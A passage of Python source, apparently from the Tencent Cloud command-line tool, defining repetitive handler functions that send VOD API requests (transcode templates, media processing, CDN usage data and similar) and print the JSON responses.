result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeAIAnalysisTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeAIAnalysisTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeAIAnalysisTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doPullEvents(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.PullEventsRequest()
model.from_json_string(json.dumps(args))
rsp = client.PullEvents(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doProcessMediaByProcedure(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ProcessMediaByProcedureRequest()
model.from_json_string(json.dumps(args))
rsp = client.ProcessMediaByProcedure(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTaskDetail(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTaskDetailRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTaskDetail(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeReviewDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeReviewDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeReviewDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeWordSamples(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeWordSamplesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeWordSamples(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeStorageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeStorageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeStorageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyAIAnalysisTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyAIAnalysisTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyAIAnalysisTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateAdaptiveDynamicStreamingTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateAdaptiveDynamicStreamingTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateAdaptiveDynamicStreamingTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeSampleSnapshotTemplates(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeSampleSnapshotTemplatesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeSampleSnapshotTemplates(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteSnapshotByTimeOffsetTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteSnapshotByTimeOffsetTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteSnapshotByTimeOffsetTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCdnLogs(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCdnLogsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCdnLogs(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeTasks(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeTasksRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeTasks(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doResetProcedureTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ResetProcedureTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ResetProcedureTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCDNUsageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCDNUsageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCDNUsageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateTranscodeTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.CreateTranscodeTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.CreateTranscodeTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeCDNStatDetails(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeCDNStatDetailsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeCDNStatDetails(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doModifyImageSpriteTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyImageSpriteTemplateRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyImageSpriteTemplate(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteClass(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteClassRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteClass(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doExecuteFunction(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ExecuteFunctionRequest()
model.from_json_string(json.dumps(args))
rsp = client.ExecuteFunction(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteVodDomain(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DeleteVodDomainRequest()
model.from_json_string(json.dumps(args))
rsp = client.DeleteVodDomain(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeMediaProcessUsageData(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeMediaProcessUsageDataRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeMediaProcessUsageData(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doConfirmEvents(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ConfirmEventsRequest()
model.from_json_string(json.dumps(args))
rsp = client.ConfirmEvents(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doComposeMedia(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.VodClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ComposeMediaRequest()
model.from_json_string(json.dumps(args))
rsp = client.ComposeMedia(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doCreateContentReviewTemplate(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
